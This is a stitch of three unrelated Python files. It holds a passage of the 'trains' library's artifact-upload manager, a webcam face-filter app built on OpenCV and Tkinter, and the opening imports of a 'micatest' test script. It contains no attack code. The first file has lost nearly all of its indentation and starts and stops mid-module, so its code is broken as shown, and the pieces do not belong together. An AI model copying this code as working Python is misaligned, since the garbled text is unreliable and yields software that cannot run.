# type: (bool, bool) -> str
"""
:param bool extract_archive: If True and artifact is of type 'archive' (compressed folder)
The returned path will be a temporary folder containing the archive content
:param bool raise_on_error: If True and the artifact could not be downloaded,
            raise ValueError; otherwise return None on failure and output a log warning.
:raise: Raises error if local copy not found.
:return: A local path to a downloaded copy of the artifact.
"""
from trains.storage import StorageManager
local_copy = StorageManager.get_local_copy(
remote_url=self.url,
extract_archive=extract_archive and self.type == 'archive',
name=self.name
)
if raise_on_error and local_copy is None:
raise ValueError(
"Could not retrieve a local copy of artifact {}, failed downloading {}".format(self.name, self.url))
return local_copy
def __repr__(self):
return str({'name': self.name, 'size': self.size, 'type': self.type, 'mode': self.mode, 'url': self.url,
'hash': self.hash, 'timestamp': self.timestamp,
'metadata': self.metadata, 'preview': self.preview, })
class Artifacts(object):
max_preview_size_bytes = 65536
_flush_frequency_sec = 300.
# notice these two should match
_save_format = '.csv.gz'
_compression = 'gzip'
# hashing constants
_hash_block_size = 65536
_pd_artifact_type = 'data-audit-table'
class _ProxyDictWrite(dict):
""" Dictionary wrapper that updates an arguments instance on any item set in the dictionary """
def __init__(self, artifacts_manager, *args, **kwargs):
super(Artifacts._ProxyDictWrite, self).__init__(*args, **kwargs)
self._artifacts_manager = artifacts_manager
            # per-artifact metadata, keyed by artifact name
self.artifact_metadata = {}
# list of hash columns to calculate uniqueness for the artifacts
self.artifact_hash_columns = {}
def __setitem__(self, key, value):
# check that value is of type pandas
if pd and isinstance(value, pd.DataFrame):
super(Artifacts._ProxyDictWrite, self).__setitem__(key, value)
if self._artifacts_manager:
self._artifacts_manager.flush()
else:
raise ValueError('Artifacts currently support pandas.DataFrame objects only')
def unregister_artifact(self, name):
self.artifact_metadata.pop(name, None)
self.pop(name, None)
def add_metadata(self, name, metadata):
self.artifact_metadata[name] = deepcopy(metadata)
def get_metadata(self, name):
return self.artifact_metadata.get(name)
def add_hash_columns(self, artifact_name, hash_columns):
self.artifact_hash_columns[artifact_name] = hash_columns
def get_hash_columns(self, artifact_name):
return self.artifact_hash_columns.get(artifact_name)
@property
def registered_artifacts(self):
# type: () -> Dict[str, Artifact]
return self._artifacts_container
@property
def summary(self):
# type: () -> str
return self._summary
def __init__(self, task):
self._task = task
        # Notice the double link; this is important since the Artifact
        # dictionary needs to signal the Artifacts manager on changes.
self._artifacts_container = self._ProxyDictWrite(self)
self._last_artifacts_upload = {}
self._unregister_request = set()
self._thread = None
self._flush_event = Event()
self._exit_flag = False
self._summary = ''
self._temp_folder = []
self._task_artifact_list = []
self._task_edit_lock = RLock()
self._storage_prefix = None
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, DataFrame, Optional[dict], Union[bool, Sequence[str]]) -> ()
"""
        :param str name: name of the artifact. Note: it will override a previous artifact if the name already exists.
:param pandas.DataFrame artifact: artifact object, supported artifacts object types: pandas.DataFrame
:param dict metadata: dictionary of key value to store with the artifact (visible in the UI)
:param list uniqueness_columns: list of columns for artifact uniqueness comparison criteria. The default value
is True, which equals to all the columns (same as artifact.columns).
"""
# currently we support pandas.DataFrame (which we will upload as csv.gz)
if name in self._artifacts_container:
LoggerRoot.get_base_logger().info('Register artifact, overwriting existing artifact \"{}\"'.format(name))
self._artifacts_container.add_hash_columns(
name, list(artifact.columns if uniqueness_columns is True else uniqueness_columns)
)
self._artifacts_container[name] = artifact
if metadata:
self._artifacts_container.add_metadata(name, metadata)
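    # Illustrative usage sketch (names are hypothetical): register a DataFrame so the
    # manager re-uploads it when its uniqueness columns change:
    #     artifacts.register_artifact('stats', df, metadata={'rows': len(df)},
    #                                 uniqueness_columns=['id'])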
def unregister_artifact(self, name):
# type: (str) -> ()
# Remove artifact from the watch list
self._unregister_request.add(name)
self.flush()
def upload_artifact(self, name, artifact_object=None, metadata=None, preview=None,
delete_after_upload=False, auto_pickle=True):
# type: (str, Optional[object], Optional[dict], Optional[str], bool, bool) -> bool
if not Session.check_min_api_version('2.3'):
LoggerRoot.get_base_logger().warning('Artifacts not supported by your TRAINS-server version, '
'please upgrade to the latest server version')
return False
if name in self._artifacts_container:
raise ValueError("Artifact by the name of {} is already registered, use register_artifact".format(name))
# cast preview to string
if preview:
preview = str(preview)
        # convert string to object if it is a file/folder (don't try to serialize long texts)
if isinstance(artifact_object, six.string_types) and len(artifact_object) < 2048:
# noinspection PyBroadException
try:
artifact_path = Path(artifact_object)
if artifact_path.exists():
artifact_object = artifact_path
elif '*' in artifact_object or '?' in artifact_object:
                    # hackish: detect wildcard in the given path
folder = Path('').joinpath(*artifact_path.parts[:-1])
if folder.is_dir() and folder.parts:
wildcard = artifact_path.parts[-1]
if list(Path(folder).rglob(wildcard)):
artifact_object = artifact_path
except Exception:
pass
artifact_type_data = tasks.ArtifactTypeData()
artifact_type_data.preview = ''
override_filename_in_uri = None
override_filename_ext_in_uri = None
uri = None
if np and isinstance(artifact_object, np.ndarray):
artifact_type = 'numpy'
artifact_type_data.content_type = 'application/numpy'
artifact_type_data.preview = preview or str(artifact_object.__repr__())
override_filename_ext_in_uri = '.npz'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
np.savez_compressed(local_filename, **{name: artifact_object})
delete_after_upload = True
elif pd and isinstance(artifact_object, pd.DataFrame):
artifact_type = 'pandas'
artifact_type_data.content_type = 'text/csv'
artifact_type_data.preview = preview or str(artifact_object.__repr__())
override_filename_ext_in_uri = self._save_format
override_filename_in_uri = name
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
artifact_object.to_csv(local_filename, compression=self._compression)
delete_after_upload = True
elif isinstance(artifact_object, Image.Image):
artifact_type = 'image'
artifact_type_data.content_type = 'image/png'
desc = str(artifact_object.__repr__())
artifact_type_data.preview = preview or desc[1:desc.find(' at ')]
override_filename_ext_in_uri = '.png'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
artifact_object.save(local_filename)
delete_after_upload = True
elif isinstance(artifact_object, dict):
artifact_type = 'JSON'
artifact_type_data.content_type = 'application/json'
preview = preview or json.dumps(artifact_object, sort_keys=True, indent=4)
override_filename_ext_in_uri = '.json'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.write(fd, bytes(preview.encode()))
os.close(fd)
if len(preview) < self.max_preview_size_bytes:
artifact_type_data.preview = preview
else:
artifact_type_data.preview = '# full json too large to store, storing first {}kb\n{}'.format(
self.max_preview_size_bytes//1024, preview[:self.max_preview_size_bytes]
)
delete_after_upload = True
elif isinstance(artifact_object, (Path, pathlib_Path,) if pathlib_Path is not None else (Path,)):
# check if single file
artifact_object = Path(artifact_object)
artifact_object = artifact_object.expanduser().absolute()
# noinspection PyBroadException
try:
create_zip_file = not artifact_object.is_file()
except Exception: # Hack for windows pathlib2 bug, is_file isn't valid.
create_zip_file = True
else: # We assume that this is not a Windows OS
if artifact_object.is_dir():
# change to wildcard
artifact_object /= '*'
if create_zip_file:
folder = Path('').joinpath(*artifact_object.parts[:-1])
if not folder.is_dir() or not folder.parts:
raise ValueError("Artifact file/folder '{}' could not be found".format(
artifact_object.as_posix()))
wildcard = artifact_object.parts[-1]
files = list(Path(folder).rglob(wildcard))
override_filename_ext_in_uri = '.zip'
override_filename_in_uri = folder.parts[-1] + override_filename_ext_in_uri
fd, zip_file = mkstemp(
prefix=quote(folder.parts[-1], safe="") + '.', suffix=override_filename_ext_in_uri
)
try:
artifact_type_data.content_type = 'application/zip'
archive_preview = 'Archive content {}:\n'.format(artifact_object.as_posix())
with ZipFile(zip_file, 'w', allowZip64=True, compression=ZIP_DEFLATED) as zf:
for filename in sorted(files):
if filename.is_file():
relative_file_name = filename.relative_to(folder).as_posix()
archive_preview += '{} - {}\n'.format(
relative_file_name, humanfriendly.format_size(filename.stat().st_size))
zf.write(filename.as_posix(), arcname=relative_file_name)
except Exception as e:
# failed uploading folder:
LoggerRoot.get_base_logger().warning('Exception {}\nFailed zipping artifact folder {}'.format(
e, folder))
return False
finally:
os.close(fd)
artifact_type_data.preview = preview or archive_preview
artifact_object = zip_file
artifact_type = 'archive'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
local_filename = artifact_object
delete_after_upload = True
else:
if not artifact_object.is_file():
raise ValueError("Artifact file '{}' could not be found".format(artifact_object.as_posix()))
override_filename_in_uri = artifact_object.parts[-1]
artifact_type_data.preview = preview or '{} - {}\n'.format(
artifact_object, humanfriendly.format_size(artifact_object.stat().st_size))
artifact_object = artifact_object.as_posix()
artifact_type = 'custom'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
local_filename = artifact_object
elif (
isinstance(artifact_object, six.string_types) and len(artifact_object) < 4096
and urlparse(artifact_object).scheme in remote_driver_schemes
):
# we should not upload this, just register
local_filename = None
uri = artifact_object
artifact_type = 'custom'
artifact_type_data.content_type = mimetypes.guess_type(artifact_object)[0]
elif isinstance(artifact_object, six.string_types):
# if we got here, we should store it as text file.
artifact_type = 'string'
artifact_type_data.content_type = 'text/plain'
if preview:
artifact_type_data.preview = preview
elif len(artifact_object) < self.max_preview_size_bytes:
artifact_type_data.preview = artifact_object
else:
artifact_type_data.preview = '# full text too large to store, storing first {}kb\n{}'.format(
self.max_preview_size_bytes//1024, artifact_object[:self.max_preview_size_bytes]
)
delete_after_upload = True
override_filename_ext_in_uri = '.txt'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
# noinspection PyBroadException
try:
with open(local_filename, 'wt') as f:
f.write(artifact_object)
except Exception:
# cleanup and raise exception
os.unlink(local_filename)
raise
elif auto_pickle:
# if we are here it means we do not know what to do with the object, so we serialize it with pickle.
artifact_type = 'pickle'
artifact_type_data.content_type = 'application/pickle'
# noinspection PyBroadException
try:
artifact_type_data.preview = preview or str(artifact_object.__repr__())[:self.max_preview_size_bytes]
except Exception:
artifact_type_data.preview = preview or ''
delete_after_upload = True
override_filename_ext_in_uri = '.pkl'
override_filename_in_uri = name + override_filename_ext_in_uri
fd, local_filename = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
# noinspection PyBroadException
try:
with open(local_filename, 'wb') as f:
pickle.dump(artifact_object, f)
except Exception:
# cleanup and raise exception
os.unlink(local_filename)
raise
else:
raise ValueError("Artifact type {} not supported".format(type(artifact_object)))
# remove from existing list, if exists
for artifact in self._task_artifact_list:
if artifact.key == name:
if artifact.type == self._pd_artifact_type:
raise ValueError("Artifact of name {} already registered, "
"use register_artifact instead".format(name))
self._task_artifact_list.remove(artifact)
break
if not local_filename:
file_size = None
file_hash = None
else:
# check that the file to upload exists
local_filename = Path(local_filename).absolute()
if not local_filename.exists() or not local_filename.is_file():
LoggerRoot.get_base_logger().warning('Artifact upload failed, cannot find file {}'.format(
local_filename.as_posix()))
return False
file_hash, _ = self.sha256sum(local_filename.as_posix())
file_size = local_filename.stat().st_size
uri = self._upload_local_file(local_filename, name,
delete_after_upload=delete_after_upload,
override_filename=override_filename_in_uri,
override_filename_ext=override_filename_ext_in_uri)
timestamp = int(time())
artifact = tasks.Artifact(key=name, type=artifact_type,
uri=uri,
content_size=file_size,
hash=file_hash,
timestamp=timestamp,
type_data=artifact_type_data,
display_data=[(str(k), str(v)) for k, v in metadata.items()] if metadata else None)
# update task artifacts
with self._task_edit_lock:
self._task_artifact_list.append(artifact)
self._task.set_artifacts(self._task_artifact_list)
return True
def flush(self):
# type: () -> ()
# start the thread if it hasn't already:
self._start()
# flush the current state of all artifacts
self._flush_event.set()
def stop(self, wait=True):
# type: (bool) -> ()
# stop the daemon thread and quit
# wait until the thread exits
self._exit_flag = True
self._flush_event.set()
if wait:
if self._thread:
self._thread.join()
# remove all temp folders
for f in self._temp_folder:
# noinspection PyBroadException
try:
Path(f).rmdir()
except Exception:
pass
def _start(self):
# type: () -> ()
""" Start daemon thread if any artifacts are registered and thread is not up yet """
if not self._thread and self._artifacts_container:
# start the daemon thread
self._flush_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def _daemon(self):
# type: () -> ()
while not self._exit_flag:
self._flush_event.wait(self._flush_frequency_sec)
self._flush_event.clear()
artifact_keys = list(self._artifacts_container.keys())
for name in artifact_keys:
try:
self._upload_data_audit_artifacts(name)
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
# create summary
self._summary = self._get_statistics()
def _upload_data_audit_artifacts(self, name):
# type: (str) -> ()
logger = self._task.get_logger()
pd_artifact = self._artifacts_container.get(name)
pd_metadata = self._artifacts_container.get_metadata(name)
# remove from artifacts watch list
if name in self._unregister_request:
try:
self._unregister_request.remove(name)
except KeyError:
pass
self._artifacts_container.unregister_artifact(name)
if pd_artifact is None:
return
override_filename_ext_in_uri = self._save_format
override_filename_in_uri = name
fd, local_csv = mkstemp(prefix=quote(name, safe="") + '.', suffix=override_filename_ext_in_uri)
os.close(fd)
local_csv = Path(local_csv)
pd_artifact.to_csv(local_csv.as_posix(), index=False, compression=self._compression)
current_sha2, file_sha2 = self.sha256sum(local_csv.as_posix(), skip_header=32)
if name in self._last_artifacts_upload:
previous_sha2 = self._last_artifacts_upload[name]
if previous_sha2 == current_sha2:
# nothing to do, we can skip the upload
# noinspection PyBroadException
try:
local_csv.unlink()
except Exception:
pass
return
self._last_artifacts_upload[name] = current_sha2
# If old trains-server, upload as debug image
if not Session.check_min_api_version('2.3'):
logger.report_image(title='artifacts', series=name, local_path=local_csv.as_posix(),
delete_after_upload=True, iteration=self._task.get_last_iteration(),
max_image_history=2)
return
# Find our artifact
artifact = None
for an_artifact in self._task_artifact_list:
if an_artifact.key == name:
artifact = an_artifact
break
file_size = local_csv.stat().st_size
# upload file
uri = self._upload_local_file(local_csv, name, delete_after_upload=True,
override_filename=override_filename_in_uri,
override_filename_ext=override_filename_ext_in_uri)
# update task artifacts
with self._task_edit_lock:
if not artifact:
artifact = tasks.Artifact(key=name, type=self._pd_artifact_type)
self._task_artifact_list.append(artifact)
artifact_type_data = tasks.ArtifactTypeData()
artifact_type_data.data_hash = current_sha2
artifact_type_data.content_type = "text/csv"
artifact_type_data.preview = str(pd_artifact.__repr__(
)) + '\n\n' + self._get_statistics({name: pd_artifact})
artifact.type_data = artifact_type_data
artifact.uri = uri
artifact.content_size = file_size
artifact.hash = file_sha2
artifact.timestamp = int(time())
artifact.display_data = [(str(k), str(v)) for k, v in pd_metadata.items()] if pd_metadata else None
self._task.set_artifacts(self._task_artifact_list)
def _upload_local_file(
self, local_file, name, delete_after_upload=False, override_filename=None, override_filename_ext=None
):
# type: (str, str, bool, Optional[str], Optional[str]) -> str
"""
Upload local file and return uri of the uploaded file (uploading in the background)
"""
upload_uri = self._task.output_uri or self._task.get_logger().get_default_upload_destination()
if not isinstance(local_file, Path):
local_file = Path(local_file)
ev = UploadEvent(metric='artifacts', variant=name,
image_data=None, upload_uri=upload_uri,
local_image_path=local_file.as_posix(),
delete_after_upload=delete_after_upload,
override_filename=override_filename,
override_filename_ext=override_filename_ext,
override_storage_key_prefix=self._get_storage_uri_prefix())
_, uri = ev.get_target_full_upload_uri(upload_uri)
# send for upload
# noinspection PyProtectedMember
self._task.reporter._report(ev)
return uri
def _get_statistics(self, artifacts_dict=None):
# type: (Optional[Dict[str, Artifact]]) -> str
summary = ''
artifacts_dict = artifacts_dict or self._artifacts_container
thread_pool = ThreadPool()
try:
# build hash row sets
artifacts_summary = []
for a_name, a_df in artifacts_dict.items():
hash_cols = self._artifacts_container.get_hash_columns(a_name)
if not pd or not isinstance(a_df, pd.DataFrame):
continue
if hash_cols is True:
hash_col_drop = []
else:
hash_cols = set(hash_cols)
missing_cols = hash_cols.difference(a_df.columns)
if missing_cols == hash_cols:
LoggerRoot.get_base_logger().warning(
'Uniqueness columns {} not found in artifact {}. '
'Skipping uniqueness check for artifact.'.format(list(missing_cols), a_name)
)
continue
elif missing_cols:
# missing_cols must be a subset of hash_cols
hash_cols.difference_update(missing_cols)
LoggerRoot.get_base_logger().warning(
'Uniqueness columns {} not found in artifact {}. Using {}.'.format(
list(missing_cols), a_name, list(hash_cols)
)
)
hash_col_drop = [col for col in a_df.columns if col not in hash_cols]
a_unique_hash = set()
def hash_row(r):
a_unique_hash.add(hash(bytes(r)))
a_shape = a_df.shape
# parallelize
a_hash_cols = a_df.drop(columns=hash_col_drop)
thread_pool.map(hash_row, a_hash_cols.values)
# add result
artifacts_summary.append((a_name, a_shape, a_unique_hash,))
# build intersection summary
for i, (name, shape, unique_hash) in enumerate(artifacts_summary):
summary += '[{name}]: shape={shape}, {unique} unique rows, {percentage:.1f}% uniqueness\n'.format(
name=name, shape=shape, unique=len(unique_hash),
percentage=100 * len(unique_hash) / float(shape[0]))
for name2, shape2, unique_hash2 in artifacts_summary[i + 1:]:
intersection = len(unique_hash & unique_hash2)
summary += '\tIntersection with [{name2}] {intersection} rows: {percentage:.1f}%\n'.format(
name2=name2, intersection=intersection,
percentage=100 * intersection / float(len(unique_hash2)))
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
finally:
thread_pool.close()
thread_pool.terminate()
return summary
def _get_temp_folder(self, force_new=False):
# type: (bool) -> str
if force_new or not self._temp_folder:
new_temp = mkdtemp(prefix='artifacts_')
self._temp_folder.append(new_temp)
return new_temp
return self._temp_folder[0]
def _get_storage_uri_prefix(self):
# type: () -> str
if not self._storage_prefix:
# noinspection PyProtectedMember
self._storage_prefix = self._task._get_output_destination_suffix()
return self._storage_prefix
@staticmethod
def sha256sum(filename, skip_header=0):
# type: (str, int) -> (Optional[str], Optional[str])
# create sha2 of the file; note that we can skip the file header (callers pass skip_header=32)
# because sometimes the header is the only thing that changed
h = hashlib.sha256()
file_hash = hashlib.sha256()
b = bytearray(Artifacts._hash_block_size)
mv = memoryview(b)
try:
with open(filename, 'rb', buffering=0) as f:
# skip header
if skip_header:
file_hash.update(f.read(skip_header))
# noinspection PyUnresolvedReferences
for n in iter(lambda: f.readinto(mv), 0):
h.update(mv[:n])
if skip_header:
file_hash.update(mv[:n])
except Exception as e:
LoggerRoot.get_base_logger().warning(str(e))
return None, None
return h.hexdigest(), file_hash.hexdigest() if skip_header else None
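# --- Illustrative sketch (not part of the original module) ---
# sha256sum() above returns two digests: one computed after skipping the first
# skip_header bytes and one over the whole file, so that a change confined to
# the header does not force a re-upload. A minimal, self-contained sketch of
# that idea; the helper name and the sample payloads below are made up.
def _skip_header_digest_sketch():
    import hashlib

    def headerless_sha256(data, skip_header=32):
        # hash everything after the (possibly changing) header
        return hashlib.sha256(data[skip_header:]).hexdigest()

    header_a = b'A' * 32
    header_b = b'B' * 32
    body = b'identical payload'
    # same body, different header -> same headerless digest, upload can be skipped
    assert headerless_sha256(header_a + body) == headerless_sha256(header_b + body)
    # the full-file digests still differ, which is what the second return value tracks
    assert hashlib.sha256(header_a + body).hexdigest() != hashlib.sha256(header_b + body).hexdigest()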
|
main.py
|
from __future__ import absolute_import, print_function
import argparse
import os
import sys
import threading
import time
from os import listdir
from os.path import isfile, join
from sys import platform as _platform
from threading import Thread
import cv2
from PIL import Image, ImageTk
if sys.version_info.major >= 3:
from tkinter import SUNKEN, RAISED, Tk, PhotoImage, Button, Label
else:
from Tkinter import SUNKEN, RAISED, Tk, PhotoImage, Button, Label
_streaming = False
if _platform == "linux" or _platform == "linux2":
try:
import pyfakewebcam
_streaming = True
except ImportError:
print("Could not import pyfakewebcam")
### Function to set which sprite must be drawn
def put_sprite(num):
global SPRITES, BTNS
SPRITES[num] = 1 - SPRITES[num] # toggle the current value
if SPRITES[num]:
BTNS[num].config(relief=SUNKEN)
else:
BTNS[num].config(relief=RAISED)
# Draws a sprite over an image
# It uses the alpha channel to see which pixels need to be replaced
# Input: image, sprite: numpy arrays
# Output: resulting merged image
def draw_sprite(frame, sprite, x_offset, y_offset):
(h, w) = (sprite.shape[0], sprite.shape[1])
(imgH, imgW) = (frame.shape[0], frame.shape[1])
if y_offset + h >= imgH: # if sprite goes off the bottom of the image
sprite = sprite[0 : imgH - y_offset, :, :]
if x_offset + w >= imgW: # if sprite gets out of image to the right
sprite = sprite[:, 0 : imgW - x_offset, :]
if x_offset < 0: # if sprite gets out of image to the left
sprite = sprite[:, abs(x_offset) : :, :]
w = sprite.shape[1]
x_offset = 0
# for each RGB channel
for c in range(3):
# channel 4 is alpha: 255 is fully opaque, 0 is a transparent background
frame[y_offset : y_offset + h, x_offset : x_offset + w, c] = sprite[:, :, c] * (
sprite[:, :, 3] / 255.0
) + frame[y_offset : y_offset + h, x_offset : x_offset + w, c] * (
1.0 - sprite[:, :, 3] / 255.0
)
return frame
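# --- Illustrative sketch (not part of the original script) ---
# draw_sprite() above blends each RGB channel as
#   out = sprite * (alpha / 255) + frame * (1 - alpha / 255)
# A tiny self-contained example of that formula on a single pixel; numpy is
# assumed to be available (cv2 already depends on it) and the values are made up.
def _alpha_blend_sketch():
    import numpy as np

    frame_pixel = np.array([10.0, 20.0, 30.0])      # BGR pixel of the frame
    sprite_pixel = np.array([200.0, 200.0, 200.0])  # BGR pixel of the sprite
    alpha = 127.5                                   # half-transparent sprite pixel
    blended = sprite_pixel * (alpha / 255.0) + frame_pixel * (1.0 - alpha / 255.0)
    # exactly half-way between sprite and frame
    assert np.allclose(blended, [105.0, 110.0, 115.0])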
# Returns the rectangles
# Img is a BGR image
# haar_cascade is a cv2.CascadeClassifier object
# the other inputs are the filter parameters
def apply_Haar_filter(img, haar_cascade, scaleFact=1.1, minNeigh=5, minSizeW=30):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
features = haar_cascade.detectMultiScale(
gray,
scaleFactor=scaleFact,
minNeighbors=minNeigh,
minSize=(minSizeW, minSizeW),
flags=cv2.CASCADE_SCALE_IMAGE,
)
return features
# Adjust the given sprite to the head's width and position
# if the sprite does not fit on the screen at the top, it is trimmed
def adjust_sprite2head(sprite, head_width, head_ypos):
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0 * head_width / w_sprite
sprite = cv2.resize(
sprite, (0, 0), fx=factor, fy=factor
) # adjust to have the same width as head
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = (
head_ypos - h_sprite
) # adjust the position of sprite to end where the head begins
if (
y_orig < 0
): # check if the head is too close to the top of the image, so that the sprite would not fit on the screen
sprite = sprite[abs(y_orig) : :, :, :] # in that case, we cut the sprite
y_orig = 0 # the sprite then begins at the top of the image
return (sprite, y_orig)
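# --- Illustrative sketch (not part of the original script) ---
# adjust_sprite2head() above scales the sprite to the head width and, when the
# scaled sprite would start above the frame (y_orig < 0), trims it and pins it
# to the top of the image. A worked numeric example with made-up sizes:
def _adjust_sprite_arithmetic_sketch():
    head_width, head_ypos = 200, 80
    sprite_h, sprite_w = 120, 100
    factor = 1.0 * head_width / sprite_w  # 2.0: sprite resized to the head width
    scaled_h = int(sprite_h * factor)     # 240 pixels tall after resizing
    y_orig = head_ypos - scaled_h         # 80 - 240 = -160 -> starts above the frame
    if y_orig < 0:
        visible_h = scaled_h - abs(y_orig)  # only the bottom 80 rows remain visible
        y_orig = 0
    assert (visible_h, y_orig) == (80, 0)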
def apply_sprite(image, path2sprite, w, x, y):
sprite = cv2.imread(path2sprite, -1)
(sprite, y_final) = adjust_sprite2head(sprite, w, y)
image = draw_sprite(image, sprite, x, y_final)
def apply_sprite2feature(
image,
sprite_path,
haar_filter,
x_offset,
y_offset,
y_offset_image,
adjust2feature,
desired_width,
x,
y,
w,
h,
):
sprite = cv2.imread(sprite_path, -1)
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
xpos = x + x_offset
ypos = y + y_offset
factor = 1.0 * desired_width / w_sprite
sub_img = image[y + int(y_offset_image) : y + h, x : x + w, :]
feature = apply_Haar_filter(sub_img, haar_filter, 1.3, 10, 10)
if len(feature) != 0:
xpos, ypos = x, y + feature[0, 1] # adjust only to feature in y axis (eyes)
if adjust2feature:
size_mustache = 1.2 # how many times bigger than mouth
factor = 1.0 * (feature[0, 2] * size_mustache) / w_sprite
xpos = (
x + feature[0, 0] - int(feature[0, 2] * (size_mustache - 1) / 2)
) # centered respect to width
ypos = (
y + y_offset_image + feature[0, 1] - int(h_sprite * factor)
) # right on top
sprite = cv2.resize(sprite, (0, 0), fx=factor, fy=factor)
image = draw_sprite(image, sprite, int(xpos), int(ypos))
# Principal loop where the OpenCV (magic) occurs
def cvloop(run_event, read_camera=0, virtual_camera=0):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [
f for f in listdir(dir_) if isfile(join(dir_, f))
] # images of flies used to make the "animation"
i = 0
video_capture = cv2.VideoCapture(read_camera) # read from webcam
(x, y, w, h) = (0, 0, 10, 10) # whatever initial values
# Filters path
haar_faces = cv2.CascadeClassifier("./filters/haarcascade_frontalface_default.xml")
haar_eyes = cv2.CascadeClassifier("./filters/haarcascade_eye.xml")
haar_mouth = cv2.CascadeClassifier("./filters/Mouth.xml")
haar_nose = cv2.CascadeClassifier("./filters/Nose.xml")
stream_camera = None
while run_event.is_set(): # while the thread is active we loop
ret, image = video_capture.read()
if not ret:
print("Error reading camera, exiting")
break
if _streaming:
if stream_camera is None:
if virtual_camera:
h, w = image.shape[:2]
stream_camera = pyfakewebcam.FakeWebcam(
"/dev/video{}".format(virtual_camera), w, h
)
faces = apply_Haar_filter(image, haar_faces, 1.3, 5, 30)
for (x, y, w, h) in faces: # if there are faces
# take first face found (x,y,w,h) = (faces[0,0],faces[0,1],faces[0,2],faces[0,3])
# hat condition
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png", w, x, y)
# mustache condition
if SPRITES[1]:
# empirically, the mouth is at 2/3 of the face from the top
# empirically, the width of the mustache is half of the face's width (offset of w/4)
# we look for mouths only in the lower half of the face (to avoid false positives)
apply_sprite2feature(
image,
"./sprites/mustache.png",
haar_mouth,
w / 4,
2 * h / 3,
h / 2,
True,
w / 2,
x,
y,
w,
h,
)
# glasses condition
if SPRITES[3]:
# empirically eyes are at 1/3 of the face from the top
apply_sprite2feature(
image,
"./sprites/glasses.png",
haar_eyes,
0,
h / 3,
0,
False,
w,
x,
y,
w,
h,
)
# flies condition
if SPRITES[2]:
# to make the "animation" we read each time a different image of that folder
# the images are placed in the correct order to give the animation impresion
apply_sprite(image, dir_ + flies[i], w, x, y)
i += 1
i = (
0 if i >= len(flies) else i
) # when done with all images of that folder, begin again
# OpenCV represents images as BGR but PIL expects RGB, so we need to change the channel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
if _streaming:
if virtual_camera:
stream_camera.schedule_frame(image)
# converts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
# Update the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
# Parser
parser = argparse.ArgumentParser()
parser.add_argument("--read_camera", type=int, default=0, help="Id to read camera from")
parser.add_argument(
"--virtual_camera",
type=int,
default=0,
help="If different from 0, creates a virtual camera with results on that id (linux only)",
)
args = parser.parse_args()
# Initialize GUI object
root = Tk()
root.title("Snap chat filters")
this_dir = os.path.dirname(os.path.realpath(__file__))
# Adds a custom logo
imgicon = PhotoImage(file=os.path.join(this_dir, "imgs", "icon.gif"))
root.tk.call("wm", "iconphoto", root._w, imgicon)
## Create 4 buttons and assign their corresponding functions to activate sprites
btn1 = Button(root, text="Hat", command=lambda: put_sprite(0))
btn1.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn2 = Button(root, text="Mustache", command=lambda: put_sprite(1))
btn2.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn3 = Button(root, text="Flies", command=lambda: put_sprite(2))
btn3.pack(side="top", fill="both", expand="no", padx="10", pady="10")
btn4 = Button(root, text="Glasses", command=lambda: put_sprite(3))
btn4.pack(side="top", fill="both", expand="no", padx="10", pady="10")
# Create the panel where webcam image will be shown
panelA = Label(root)
panelA.pack(padx=10, pady=10)
# Variable to control which sprite you want to visualize
SPRITES = [
0,
0,
0,
0,
] # hat, mustache, flies, glasses -> 1 is visible, 0 is not visible
BTNS = [btn1, btn2, btn3, btn4]
# Creates a thread where the magic occurs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event, args.read_camera, args.virtual_camera))
action.setDaemon(True)
action.start()
# Function to close everything properly (threads and GUI)
def terminate():
global root, run_event, action
print("Closing thread opencv...")
run_event.clear()
time.sleep(1)
# action.join() # strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print("All closed! Chao")
# When the GUI is closed it invokes the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() # creates loop of GUI
|
test.py
|
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from traceback import format_exc, print_stack
from re import compile as re_compile, IGNORECASE as re_IGNORECASE, sub as re_sub
from os import path as os_path, getuid as os_getuid, urandom as os_urandom, remove as os_remove, makedirs as os_makedirs, environ, curdir, sep
from docker import Client
from json import loads as json_loads, dumps as json_dumps
from time import sleep, time
from urlparse import urlparse, parse_qs
from SimpleHTTPServer import SimpleHTTPRequestHandler
from threading import Thread
from binascii import hexlify as binascii_hexlify
from logging.handlers import RotatingFileHandler
from logging import getLogger, StreamHandler, Formatter, Filter, DEBUG, ERROR, INFO, WARN, CRITICAL
from copy import deepcopy
from urllib import urlencode
import requests
import docker
import socket
import sys
import BaseHTTPServer
import httplib
import logging
logger = getLogger("micatest")
